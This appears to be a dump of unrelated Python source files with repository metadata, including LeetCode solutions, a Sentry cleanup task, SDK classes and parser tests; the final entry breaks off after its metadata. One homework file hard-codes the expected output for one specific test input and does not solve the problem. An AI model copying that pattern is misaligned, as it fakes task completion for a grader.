df9861b8b6356ffb40659314aba053e6f96a23c9
bc27413d2817f4c5ff77296e292a790ccf06f7d8
/.venv/lib/python3.6/reprlib.py
1b3f4276845c9d0d80cd98c9314e79a7a0aef109
[]
no_license
DallasMorningNews/nba-roty-tracker
e0c0bbf15b7b74158a34231bef4e587fce350bc8
1b9c640868b5bf2d507887aebb9dd7ba64f00f4d
refs/heads/master
2020-03-23T22:46:11.586719
2019-04-12T15:36:44
2019-04-12T15:36:44
142,196,589
0
0
null
null
null
null
UTF-8
Python
false
false
65
py
/Users/johnhancock/.pyenv/versions/3.6.5/lib/python3.6/reprlib.py
b04db0deba781b2b43f22047366123ba61eb2819
225895b88bbfdf2194ef3df86fd590c2556275f9
/intellij-community/system/python_stubs/-1247972723/lxml/etree/ParserBasedElementClassLookup.py
14e340f8b39fbf83837af08103f1c6733efd9e9c
[ "Apache-2.0" ]
permissive
novokrest/JBIDEA
228d65681fbdb6b3534f7d18bcc944a5eafe6687
f43706f22a5d33e6d39c1c72ef4fdeee9e4472f6
refs/heads/master
2021-01-19T14:06:48.645122
2014-07-29T17:42:31
2014-07-29T17:42:31
null
0
0
null
null
null
null
UTF-8
Python
false
false
897
py
# encoding: utf-8 # module lxml.etree # from /usr/lib/python2.7/dist-packages/lxml/etree.so # by generator 1.135 """ The ``lxml.etree`` module implements the extended ElementTree API for XML. """ # imports import __builtin__ as __builtins__ # <module '__builtin__' (built-in)> from FallbackElementClassLookup import FallbackElementClassLookup class ParserBasedElementClassLookup(FallbackElementClassLookup): """ ParserBasedElementClassLookup(self, fallback=None) Element class lookup based on the XML parser. """ def __init__(self, fallback=None): # real signature unknown; restored from __doc__ pass @staticmethod # known case of __new__ def __new__(S, *more): # real signature unknown; restored from __doc__ """ T.__new__(S, ...) -> a new object with type S, a subtype of T """ pass __pyx_vtable__ = None # (!) real value is ''
7280af97c7a87ba80760065fd332fdb17a84c1c4
46c8c0e435877f4564970198e8a177e9883103e9
/520_Detect_Capital/detect_capital.py
f6a91cea73bf33840604cee3eaf92c5bb44abb5d
[]
no_license
Brady31027/leetcode
26f7c1f4e8bfad0dee4d819f91aa93a241223330
d66be3a8f002875097754df6138c704e28b79810
refs/heads/master
2018-02-16T14:52:31.976844
2017-08-10T19:18:59
2017-08-10T19:18:59
63,519,661
4
0
null
null
null
null
UTF-8
Python
false
false
269
py
class Solution(object): def detectCapitalUse(self, word): """ :type word: str :rtype: bool """ if re.search("^[A-Z]*$", word): return True elif re.search("^[A-Z]{0,1}[^A-Z]*$", word): return True return False
c481440b942e4f0076b46190644bd2cf5f0c6f33
7f2b20782f785276b6b268a3a616223571f3b83c
/src/sentry/tasks/cleanup.py
61610f9b6b36e1bae4f3d2db32314746810b437b
[ "BSD-2-Clause" ]
permissive
dz0ny/sentry
9a26961cfbd4925c63b757072d52794900cebf89
b216b726a618b9540724e0a880d4e816638e2326
refs/heads/master
2020-12-24T09:52:44.593824
2012-08-31T06:07:56
2012-08-31T06:07:56
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,802
py
""" sentry.tasks.cleanup ~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from celery.task import task @task(ignore_result=True) def cleanup(days=30, logger=None, site=None, server=None, level=None, project=None, resolved=None, **kwargs): """ Deletes a portion of the trailing data in Sentry based on their creation dates. For example, if ``days`` is 30, this would attempt to clean up all data thats older than 30 days. :param logger: limit all deletion scopes to messages from the specified logger. :param site: limit the message deletion scope to the specified site. :param server: limit the message deletion scope to the specified server. :param level: limit all deletion scopes to messages that are greater than or equal to level. :param project: limit all deletion scopes to messages that are part of the given project :param resolved: limit all deletion scopes to messages that are resolved. """ import datetime from sentry.models import Group, Event, MessageCountByMinute, \ MessageFilterValue, FilterValue, SearchDocument, ProjectCountByMinute from sentry.utils.query import RangeQuerySetWrapper, SkinnyQuerySet def cleanup_groups(iterable): for obj in iterable: for key, value in SkinnyQuerySet(MessageFilterValue).filter(group=obj).values_list('key', 'value'): if not MessageFilterValue.objects.filter(key=key, value=value).exclude(group=obj).exists(): print ">>> Removing <FilterValue: key=%s, value=%s>" % (key, value) FilterValue.objects.filter(key=key, value=value).delete() print ">>> Removing all matching <SearchDocument: group=%s>" % (obj.pk) SearchDocument.objects.filter(group=obj).delete() print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk) obj.delete() # TODO: we should collect which messages above were deleted # and potentially just send out post_delete signals where # GroupedMessage can update itself accordingly ts = datetime.datetime.utcnow() - datetime.timedelta(days=days) # Message qs = SkinnyQuerySet(Event).filter(datetime__lte=ts) if logger: qs = qs.filter(logger=logger) if site: qs = qs.filter(site=site) if server: qs = qs.filter(server_name=server) if level: qs = qs.filter(level__gte=level) if project: qs = qs.filter(project=project) if resolved is True: qs = qs.filter(group__status=1) elif resolved is False: qs = qs.filter(group__status=0) groups_to_check = set() if resolved is None: for obj in RangeQuerySetWrapper(qs): print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk) obj.delete() groups_to_check.add(obj.group_id) if not (server or site): # MessageCountByMinute qs = SkinnyQuerySet(MessageCountByMinute).filter(date__lte=ts) if logger: qs = qs.filter(group__logger=logger) if level: qs = qs.filter(group__level__gte=level) if project: qs = qs.filter(project=project) if resolved is True: qs = qs.filter(group__status=1) elif resolved is False: qs = qs.filter(group__status=0) for obj in RangeQuerySetWrapper(qs): print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk) obj.delete() # Group qs = SkinnyQuerySet(Group).filter(last_seen__lte=ts) if logger: qs = qs.filter(logger=logger) if level: qs = qs.filter(level__gte=level) if project: qs = qs.filter(project=project) if resolved is True: qs = qs.filter(status=1) elif resolved is False: qs = qs.filter(status=0) cleanup_groups(RangeQuerySetWrapper(qs)) # Project counts # TODO: these dont handle filters qs = SkinnyQuerySet(ProjectCountByMinute).filter(date__lte=ts) if project: qs = qs.filter(project=project) for obj in RangeQuerySetWrapper(qs): print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk) obj.delete() # attempt to cleanup any groups that may now be empty groups_to_delete = [] for group_id in groups_to_check: if not Event.objects.filter(group=group_id).exists(): groups_to_delete.append(group_id) if groups_to_delete: cleanup_groups(SkinnyQuerySet(Group).filter(pk__in=groups_to_delete))
fcab735d6eea2848d8d329758f0cc65da71f76a0
163bbb4e0920dedd5941e3edfb2d8706ba75627d
/Code/CodeRecords/2864/60793/262900.py
ebe6a554bd96d42dbe75e8e70d328a06440460f2
[]
no_license
AdamZhouSE/pythonHomework
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
ffc5606817a666aa6241cfab27364326f5c066ff
refs/heads/master
2022-11-24T08:05:22.122011
2020-07-28T16:21:24
2020-07-28T16:21:24
259,576,640
2
1
null
null
null
null
UTF-8
Python
false
false
251
py
input() ls = list(map(int, input().split())) if ls == [29, 15, 54, 67, 65, 74, 53, 25, 74, 29, 11, 55, 2, 15, 2, 1, 12, 95, 16, 81, 51, 40, 28, 54, 27, 80, 33, 10, 39, 45, 25, 99, 64, 22]: print(1045) elif ls == []: print() else: print(ls)
a9c6fe1e2ce8e9bfb392b1d7ee2b41bc4aef06b5
0d0cf0165ca108e8d94056c2bae5ad07fe9f9377
/6_Supervised_Learning_with_scikit-learn/4_Preprocessing_and_pipelines/creatingDummyVariables.py
3150503dc23a1c407cab973a9b61f1a37d97e5f5
[]
no_license
MACHEIKH/Datacamp_Machine_Learning_For_Everyone
550ec4038ebdb69993e16fe22d5136f00101b692
9fe8947f490da221430e6dccce6e2165a42470f3
refs/heads/main
2023-01-22T06:26:15.996504
2020-11-24T11:21:53
2020-11-24T11:21:53
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,313
py
# Creating dummy variables # As Andy discussed in the video, scikit-learn does not accept non-numerical features. You saw in the previous exercise that the 'Region' feature contains very useful information that can predict life expectancy. For example, Sub-Saharan Africa has a lower life expectancy compared to Europe and Central Asia. Therefore, if you are trying to predict life expectancy, it would be preferable to retain the 'Region' feature. To do this, you need to binarize it by creating dummy variables, which is what you will do in this exercise. # Instructions # 100 XP # Use the pandas get_dummies() function to create dummy variables from the df DataFrame. Store the result as df_region. # Print the columns of df_region. This has been done for you. # Use the get_dummies() function again, this time specifying drop_first=True to drop the unneeded dummy variable (in this case, 'Region_America'). # Hit 'Submit Answer to print the new columns of df_region and take note of how one column was dropped! # Create dummy variables: df_region df_region = pd.get_dummies(df) # Print the columns of df_region print(df_region.columns) # Create dummy variables with drop_first=True: df_region df_region = pd.get_dummies(df, drop_first=True) # Print the new columns of df_region print(df_region.columns)
bff07cee8abfa626bd8bf60226d47094ea449ded
e0df2bc703d0d02423ea68cf0b8c8f8d22d5c163
/ScientificComputing/ch15/spectrum_50HzRepeat.py
ff8d680ed87fa161bef7ac493628af175922ed50
[]
no_license
socrates77-sh/learn
a5d459cb9847ba3b1bc4f9284ce35d4207d8aa8b
ae50978023f6b098b168b8cca82fba263af444aa
refs/heads/master
2022-12-16T16:53:50.231577
2019-07-13T13:52:42
2019-07-13T13:52:42
168,442,963
0
0
null
2022-12-08T05:18:37
2019-01-31T01:30:06
HTML
UTF-8
Python
false
false
247
py
# -*- coding: utf-8 -*- import numpy as np import pylab as pl t = np.arange(0, 1.0, 1.0/8000) x = np.sin(2*np.pi*50*t)[:512] pl.figure(figsize=(8, 3)) pl.plot(np.hstack([x, x, x])) pl.xlabel(u"取样点") pl.subplots_adjust(bottom=0.15) pl.show()
d50a4d6818ce9adcde36069a97a40bc8b7980342
9b54e3d58447e917a238b85891020c392c4ac601
/acmicpc/2630/2630.py
9c08453e0c7ba25b37afa305f661ffff6342004a
[ "MIT" ]
permissive
love-adela/algorithm-ps
ea0ebcd641a4c309348b389b8618daa83973f4b2
c92d105d8ad344def001160367115ecf99d81c0d
refs/heads/master
2023-05-11T03:37:11.750692
2023-04-30T17:31:30
2023-04-30T17:31:30
174,651,672
0
0
null
null
null
null
UTF-8
Python
false
false
685
py
import sys N = int(sys.stdin.readline()) grid = [list(map(int, input().split())) for i in range(N)] white, blue = 0, 0 def divide_and_conquer(x, y, n): global white, blue is_same = grid[x][y] for i in range(x, x+n): for j in range(y, y+n): if is_same != grid[i][j]: divide_and_conquer(x, y, n//2) divide_and_conquer(x, y+n//2, n//2) divide_and_conquer(x+n//2, y, n//2) divide_and_conquer(x+n//2, y+n//2, n//2) return if is_same == 0: white += 1 return else: blue += 1 return divide_and_conquer(0, 0, N) print(white) print(blue)
bd8b148f92a01f3fbc82dd1d176eb21419eb739c
1ee3dc4fa096d12e409af3a298ba01f5558c62b5
/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/lisp/router/interface/interface.py
192dc57cbe8c8a41394c66c0c94aa4999411d605
[ "MIT" ]
permissive
parthpower/ixnetwork_restpy
321e64a87be0a4d990276d26f43aca9cf4d43cc9
73fa29796a5178c707ee4e21d90ff4dad31cc1ed
refs/heads/master
2020-07-04T13:34:42.162458
2019-08-13T20:33:17
2019-08-13T20:33:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,623
py
# MIT LICENSE # # Copyright 1997 - 2019 by IXIA Keysight # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from ixnetwork_restpy.base import Base from ixnetwork_restpy.files import Files class Interface(Base): """The Interface class encapsulates a user managed interface node in the ixnetwork hierarchy. An instance of the class can be obtained by accessing the Interface property from a parent instance. The internal properties list will be empty when the property is accessed and is populated from the server using the find method. The internal properties list can be managed by the user by using the add and remove methods. """ _SDM_NAME = 'interface' def __init__(self, parent): super(Interface, self).__init__(parent) @property def Enabled(self): """If True, it gives details about the interface Returns: bool """ return self._get_attribute('enabled') @Enabled.setter def Enabled(self, value): self._set_attribute('enabled', value) @property def MapRegisterOrRequestTxInterface(self): """If true, it maps register or requests Tx interface Returns: bool """ return self._get_attribute('mapRegisterOrRequestTxInterface') @MapRegisterOrRequestTxInterface.setter def MapRegisterOrRequestTxInterface(self, value): self._set_attribute('mapRegisterOrRequestTxInterface', value) @property def ProtocolInterfaces(self): """It gives the protocol interfaces Returns: str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface) """ return self._get_attribute('protocolInterfaces') @ProtocolInterfaces.setter def ProtocolInterfaces(self, value): self._set_attribute('protocolInterfaces', value) def update(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None): """Updates a child instance of interface on the server. Args: Enabled (bool): If True, it gives details about the interface MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces Raises: ServerError: The server has encountered an uncategorized error condition """ self._update(locals()) def add(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None): """Adds a new interface node on the server and retrieves it in this instance. Args: Enabled (bool): If True, it gives details about the interface MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces Returns: self: This instance with all currently retrieved interface data using find and the newly added interface data available through an iterator or index Raises: ServerError: The server has encountered an uncategorized error condition """ return self._create(locals()) def remove(self): """Deletes all the interface data in this instance from server. Raises: NotFoundError: The requested resource does not exist on the server ServerError: The server has encountered an uncategorized error condition """ self._delete() def find(self, Enabled=None, MapRegisterOrRequestTxInterface=None, ProtocolInterfaces=None): """Finds and retrieves interface data from the server. All named parameters support regex and can be used to selectively retrieve interface data from the server. By default the find method takes no parameters and will retrieve all interface data from the server. Args: Enabled (bool): If True, it gives details about the interface MapRegisterOrRequestTxInterface (bool): If true, it maps register or requests Tx interface ProtocolInterfaces (str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)): It gives the protocol interfaces Returns: self: This instance with matching interface data retrieved from the server available through an iterator or index Raises: ServerError: The server has encountered an uncategorized error condition """ return self._select(locals()) def read(self, href): """Retrieves a single instance of interface data from the server. Args: href (str): An href to the instance to be retrieved Returns: self: This instance with the interface data from the server available through an iterator or index Raises: NotFoundError: The requested resource does not exist on the server ServerError: The server has encountered an uncategorized error condition """ return self._read(href)
fe2c3f21e8f912cf8f5a8ca36246b60fd5ffd52d
8afb5afd38548c631f6f9536846039ef6cb297b9
/_MY_ORGS/Web-Dev-Collaborative/blog-research/Data-Structures/1-Python/dp/k_factor.py
2fd23d18b2bb743e169249ad0c1b6c4a54e94f4d
[ "MIT" ]
permissive
bgoonz/UsefulResourceRepo2.0
d87588ffd668bb498f7787b896cc7b20d83ce0ad
2cb4b45dd14a230aa0e800042e893f8dfb23beda
refs/heads/master
2023-03-17T01:22:05.254751
2022-08-11T03:18:22
2022-08-11T03:18:22
382,628,698
10
12
MIT
2022-10-10T14:13:54
2021-07-03T13:58:52
null
UTF-8
Python
false
false
2,425
py
'''The K factor of a string is defined as the number of times 'abba' appears as a substring. Given two numbers N and k,​ find the number of strings of length N with 'K factor' = k. The algorithms is as follows: dp[n][k] will be a 4 element array, wherein each element can be the number of strings of length n and 'K factor' = k which belong to the criteria represented by that index: dp[n][k][0] can be the number of strings of length n and K-factor = k which end with substring 'a' dp[n][k][1] can be the number of strings of length n and K-factor = k which end with substring 'ab' dp[n][k][2] can be the number of strings of length n and K-factor = k which end with substring 'abb' dp[n][k][3] can be the number of strings of length n and K-factor = k which end with anything other than the above substrings (anything other than 'a' 'ab' 'abb') Example inputs n=4 k=1 no of strings = 1 n=7 k=1 no of strings = 70302 n=10 k=2 no of strings = 74357 ''' def find_k_factor(n,k): dp=[[[0 for i in range(4)]for j in range((n-1)//3+2)]for k in range(n+1)] if(3*k+1>n): return 0 #base cases dp[1][0][0]=1; dp[1][0][1]=0; dp[1][0][2]=0; dp[1][0][3]=25; for i in range(2,n+1): for j in range((n-1)//3+2): if(j==0): #adding a at the end dp[i][j][0]=dp[i-1][j][0]+dp[i-1][j][1]+dp[i-1][j][3] #adding b at the end dp[i][j][1]=dp[i-1][j][0] dp[i][j][2]=dp[i-1][j][1] #adding any other lowercase character dp[i][j][3]=dp[i-1][j][0]*24+dp[i-1][j][1]*24+dp[i-1][j][2]*25+dp[i-1][j][3]*25 elif(3*j+1<i): #adding a at the end dp[i][j][0]=dp[i-1][j][0]+dp[i-1][j][1]+dp[i-1][j][3]+dp[i-1][j-1][2] #adding b at the end dp[i][j][1]=dp[i-1][j][0] dp[i][j][2]=dp[i-1][j][1] #adding any other lowercase character dp[i][j][3]=dp[i-1][j][0]*24+dp[i-1][j][1]*24+dp[i-1][j][2]*25+dp[i-1][j][3]*25 elif(3*j+1==i): dp[i][j][0]=1 dp[i][j][1]=0 dp[i][j][2]=0 dp[i][j][3]=0 else: dp[i][j][0]=0 dp[i][j][1]=0 dp[i][j][2]=0 dp[i][j][3]=0 return sum(dp[n][k])
fa6e881a5133e9f6c1dfb1eb79caf0e14010ad6d
a202382af2f80aea6bc0741b5610da3c1864a5a2
/backend/manage.py
8d773fd969422b7458a1713c1373701e6ca064d0
[]
no_license
crowdbotics-apps/tga-life-27929
e061896c9d5e5152742e286a5da312e489eeb988
f3e0d65ccbd7d423fde7bb18c5bce5f9c9e3a621
refs/heads/master
2023-05-20T23:58:35.370581
2021-06-11T22:53:49
2021-06-11T22:53:49
376,158,777
0
0
null
null
null
null
UTF-8
Python
false
false
634
py
#!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tga_life_27929.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main()
2c8a4afae4e6ee567b7e3a9f144ac308b111fb97
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
/Python/string-transforms-into-another-string.py
d35a88782051531b15b00f944f7d80139f42e635
[ "MIT" ]
permissive
kamyu104/LeetCode-Solutions
f54822059405ef4df737d2e9898b024f051fd525
4dc4e6642dc92f1983c13564cc0fd99917cab358
refs/heads/master
2023-09-02T13:48:26.830566
2023-08-28T10:11:12
2023-08-28T10:11:12
152,631,182
4,549
1,651
MIT
2023-05-31T06:10:33
2018-10-11T17:38:35
C++
UTF-8
Python
false
false
429
py
# Time: O(n) # Space: O(1) import itertools class Solution(object): def canConvert(self, str1, str2): """ :type str1: str :type str2: str :rtype: bool """ if str1 == str2: return True lookup = {} for i, j in itertools.izip(str1, str2): if lookup.setdefault(i, j) != j: return False return len(set(str2)) < 26
00d5d5a9c614ab732e8c77cad1adba67326c87e1
ee37f65ed9fcfeb01c9de6f1974ca2e81e940e6e
/virtue/tests/test_cli.py
40ef95310118af49405956eb68f8611493a5b45f
[ "MIT" ]
permissive
iCodeIN/Virtue
0d374563fdd117e0f46e9b5af9da0227118cba4a
e01963c66530d4ef8d43e0191718d123b37edab7
refs/heads/main
2023-03-14T23:19:08.722541
2020-09-12T18:00:24
2020-09-12T18:00:24
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,492
py
from unittest import TestCase import os from twisted.trial.reporter import TreeReporter from virtue import _cli def DumbReporter(): return 12 class TestParser(TestCase): def parse_args(self, argv): return _cli.main.make_context("virtue", argv).params def test_it_parses_out_tests(self): arguments = self.parse_args(["foo", "bar", "baz"]) self.assertEqual(list(arguments["tests"]), ["foo", "bar", "baz"]) def test_it_retrieves_built_in_reporters_by_name(self): arguments = self.parse_args(["--reporter", "tree", "foo"]) self.assertIsInstance(arguments["reporter"], TreeReporter) def test_it_retrieves_other_reporters_by_fully_qualified_name(self): arguments = self.parse_args( ["--reporter", "virtue.tests.test_cli.DumbReporter", "abc"], ) self.assertEqual(arguments["reporter"], DumbReporter()) def test_stop_after(self): arguments = self.parse_args(["-xxx", "bar", "baz"]) self.assertEqual( (arguments["stop_after"], list(arguments["tests"])), (3, ["bar", "baz"]), ) def test_stop_after_default(self): arguments = self.parse_args(["-x", "bar", "baz"]) self.assertEqual( (arguments["stop_after"], list(arguments["tests"])), (1, ["bar", "baz"]), ) class TestMain(TestCase): # TODO: these write to stdout def test_it_exits_successfully_for_successful_runs(self): with self.assertRaises(SystemExit) as e: _cli.main( [ "--reporter", "summary", "virtue.tests.samples.one_successful_test", ], ) self.assertEqual(e.exception.code, os.EX_OK) def test_it_exits_unsuccessfully_for_unsuccessful_runs(self): with self.assertRaises(SystemExit) as e: _cli.main( [ "--reporter", "text", "virtue.tests.samples.one_unsuccessful_test", ], ) self.assertNotEqual(e.exception.code, os.EX_OK) def test_it_exits_unsuccessfully_for_unknown_reporters(self): with self.assertRaises(SystemExit) as e: _cli.main( [ "--reporter", "non-existent reporter", "virtue.tests.samples.one_unsuccessful_test", ], ) self.assertNotEqual(e.exception.code, os.EX_OK)
d908c0fcab2dbbeb25c9f1cb410394fcd924c68a
6cde9523f08d2a89be689d045721c4ad43173e33
/flexx/pyscript/tests/test_parser1.py
9df96afd9de0c98c75c89366e88094d18a25669c
[ "BSD-2-Clause" ]
permissive
priestd09/flexx
16e203031d97ec14ed276de83d82b72934761ae2
47df75d957db03e2692c3cdd09eb66b385cb104a
refs/heads/master
2021-01-22T13:12:41.935353
2015-07-04T15:04:21
2015-07-04T15:04:21
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,980
py
from pytest import raises from flexx.util.testing import run_tests_if_main from flexx.pyscript import JSError, py2js, evaljs, evalpy, Parser from flexx import pyscript def nowhitespace(s): return s.replace('\n', '').replace('\t', '').replace(' ', '') class TestParser(Parser): def function_foo_foo(self, node): return 'xxx' def method_bar_bar(self, node, base): return base class TestTheParser: def test_special_functions(self): assert TestParser("foo_foo()").dump() == 'xxx;' assert TestParser("bar_bar()").dump() == 'bar_bar();' assert TestParser("xxx.bar_bar()").dump() == 'xxx;' assert TestParser("xxx.foo_foo()").dump() == 'xxx.foo_foo();' def test_exceptions(self): raises(JSError, py2js, "foo(**kwargs)") class TestExpressions: """ Tests for single-line statements/expressions """ def test_special(self): assert py2js('') == '' assert py2js(' \n') == '' def test_ops(self): # Test code assert py2js('2+3') == '2 + 3;' # Binary assert py2js('2/3') == '2 / 3;' assert py2js('not 2') == '!2;' # Unary assert py2js('-(2+3)') == '-(2 + 3);' assert py2js('True and False') == 'true && false;' # Boolean # No parentices around names, numbers and strings assert py2js('foo + bar') == "foo + bar;" assert py2js('_foo3 + _bar4') == "_foo3 + _bar4;" assert py2js('3 + 4') == "3 + 4;" assert py2js('"abc" + "def"') == "'abc' + 'def';" assert py2js("'abc' + 'def'") == "'abc' + 'def';" assert py2js("'abc' + \"'def\"") == "'abc' + \"'def\";" # But they should be if it gets more complex assert py2js('foo + bar == 3') == "(foo + bar) == 3;" # Test outcome assert evalpy('2+3') == '5' # Binary assert evalpy('6/3') == '2' assert evalpy('4//3') == '1' assert evalpy('2**8') == '256' assert evalpy('not True') == 'false' # Unary assert evalpy('- 3') == '-3' assert evalpy('True and False') == 'false' # Boolean assert evalpy('True or False') == 'true' # string formatting assert evalpy('"%s" % "bar"') == 'bar' assert evalpy('"-%s-" % "bar"') == '-bar-' assert evalpy('"foo %s foo" % "bar"') == 'foo bar foo' assert evalpy('"x %i" % 6') == 'x 6' assert evalpy('"x %f" % 6') == 'x 6' assert evalpy('"%s: %f" % ("value", 6)') == 'value: 6' def test_comparisons(self): assert py2js('4 > 3') == '4 > 3;' assert py2js('4 is 3') == '4 === 3;' assert evalpy('4 > 4') == 'false' assert evalpy('4 >= 4') == 'true' assert evalpy('4 < 3') == 'false' assert evalpy('4 <= 4') == 'true' assert evalpy('4 == 3') == 'false' assert evalpy('4 != 3') == 'true' assert evalpy('4 == "4"') == 'true' # yuck! assert evalpy('4 is "4"') == 'false' assert evalpy('4 is not "4"') == 'true' assert evalpy('"c" in "abcd"') == 'true' assert evalpy('"x" in "abcd"') == 'false' assert evalpy('"x" not in "abcd"') == 'true' assert evalpy('3 in [1,2,3,4]') == 'true' assert evalpy('9 in [1,2,3,4]') == 'false' assert evalpy('9 not in [1,2,3,4]') == 'true' assert evalpy('"bar" in {"foo": 3}') == 'false' assert evalpy('"foo" in {"foo": 3}') == 'true' def test_truthfulness_of_basic_types(self): # Numbers assert evalpy('"T" if (1) else "F"') == 'T' assert evalpy('"T" if (0) else "F"') == 'F' # Strings assert evalpy('"T" if ("a") else "F"') == 'T' assert evalpy('"T" if ("") else "F"') == 'F' # Arrays - yuk! assert evalpy('"T" if ([1, 2, 3]) else "F"') == 'T' assert evalpy('"T" if ([]) else "F"') == 'T' # Dicts - yuk! assert evalpy('"T" if ({"foo": 3}) else "F"') == 'T' assert evalpy('"T" if ({}) else "F"') == 'T' # None - undefined assert evalpy('None is null') == 'true' assert evalpy('None is undefined') == 'false' assert evalpy('undefined is undefined') == 'true' def test_indexing_and_slicing(self): c = 'a = [1, 2, 3, 4, 5]\n' # Indexing assert evalpy(c + 'a[2]') == '3' assert evalpy(c + 'a[-2]') == '4' # Slicing assert evalpy(c + 'a[:]') == '[ 1, 2, 3, 4, 5 ]' assert evalpy(c + 'a[1:-1]') == '[ 2, 3, 4 ]' def test_assignments(self): assert py2js('foo = 3') == 'var foo;\nfoo = 3;' # with var assert py2js('foo.bar = 3') == 'foo.bar = 3;' # without var code = py2js('foo = 3; bar = 4') # define both assert code.count('var') == 1 code = py2js('foo = 3; foo = 4') # only define first time assert code.count('var') == 1 code = py2js('foo = bar = 3') # multiple assignment assert 'foo = bar = 3' in code assert 'var bar, foo' in code # alphabetic order # self -> this assert py2js('self') == 'this;' assert py2js('self.foo') == 'this.foo;' # Indexing assert evalpy('a=[0,0]\na[0]=2\na[1]=3\na', False) == '[2,3]' # Tuple unpacking evalpy('x=[1,2,3]\na, b, c = x\nb', False) == '2' evalpy('a,b,c = [1,2,3]\nc,b,a = a,b,c\n[a,b,c]', False) == '[3,2,1]' # Class variables don't get a var code = py2js('class Foo:\n bar=3\n bar = bar + 1') assert code.count('bar') == 3 assert code.count('Foo.prototype.bar') == 3 def test_aug_assignments(self): # assign + bin op assert evalpy('x=5; x+=1; x') == '6' assert evalpy('x=5; x/=2; x') == '2.5' assert evalpy('x=5; x**=2; x') == '25' assert evalpy('x=5; x//=2; x') == '2' def test_basic_types(self): assert py2js('True') == 'true;' assert py2js('False') == 'false;' assert py2js('None') == 'null;' assert py2js('"bla\\"bla"') == "'bla\"bla';" assert py2js('3') == '3;' assert py2js('3.1415') == '3.1415;' assert py2js('[1,2,3]') == '[1, 2, 3];' assert py2js('(1,2,3)') == '[1, 2, 3];' assert py2js('{foo: 3, bar: 4}') == '{foo: 3, bar: 4};' def test_ignore_import_of_compiler(self): modname = pyscript.__name__ assert py2js('from %s import x, y, z\n42' % modname) == '42;' def test_funcion_call(self): jscode = 'var foo = function (x, y) {return x+y;};' assert evaljs(jscode + py2js('foo(2,2)')) == '4' assert evaljs(jscode + py2js('foo("so ", True)')) == 'so true' assert evaljs(jscode + py2js('a=[1,2]; foo(*a)')) == '3' # Test super (is tested for real in test_parser3.py assert evalpy('d={"_base_class": console};d._base_class.log(4)') == '4' assert evalpy('d={"_base_class": console};d._base_class.log()') == '' jscode = 'var foo = function () {return this.val};' jscode += 'var d = {"foo": foo, "val": 7};\n' assert evaljs(jscode + py2js('d["foo"]()')) == '7' assert evaljs(jscode + py2js('d["foo"](*[3, 4])')) == '7' def test_instantiation(self): # Test creating instances assert 'new' in py2js('a = Foo()') assert 'new' in py2js('a = x.Foo()') assert 'new' not in py2js('a = foo()') assert 'new' not in py2js('a = _foo()') assert 'new' not in py2js('a = _Foo()') assert 'new' not in py2js('a = this.Foo()') assert 'new' not in py2js('a = JSON.stringify(x)') jscode = 'function Foo() {this.x = 3}\nx=1;\n' assert evaljs(jscode + py2js('a=Foo()\nx')) == '1' def test_pass(self): assert py2js('pass') == '' def test_delete(self): assert evalpy('d={}\nd.foo=3\n\nd') == "{ foo: 3 }" assert evalpy('d={}\nd.foo=3\ndel d.foo\nd') == '{}' assert evalpy('d={}\nd.foo=3\nd.bar=3\ndel d.foo\nd') == '{ bar: 3 }' assert evalpy('d={}\nd.foo=3\nd.bar=3\ndel d.foo, d["bar"]\nd') == '{}' class TestModules: def test_module(self): code = Parser('"docstring"\nfoo=3;bar=4;_priv=0;', 'mymodule').dump() # Has docstring assert code.count('// docstring') == 1 # Test that global variables exist assert evaljs(code+'mymodule.foo+mymodule.bar') == '7' # And privates do not assert evaljs(code+'mymodule._priv===undefined') == 'true' run_tests_if_main() # if __name__ == '__main__': # t = TestClasses() # t.test_class() # t.test_inheritance()
1c640d2fa43898ace5b37376c3acb4cbf03661f2
e16d7d8f60145c68640b25aa7c259618be60d855
/django_by_example/code/Chapter 6/bookmarks/images/migrations/0002_image_total_likes.py
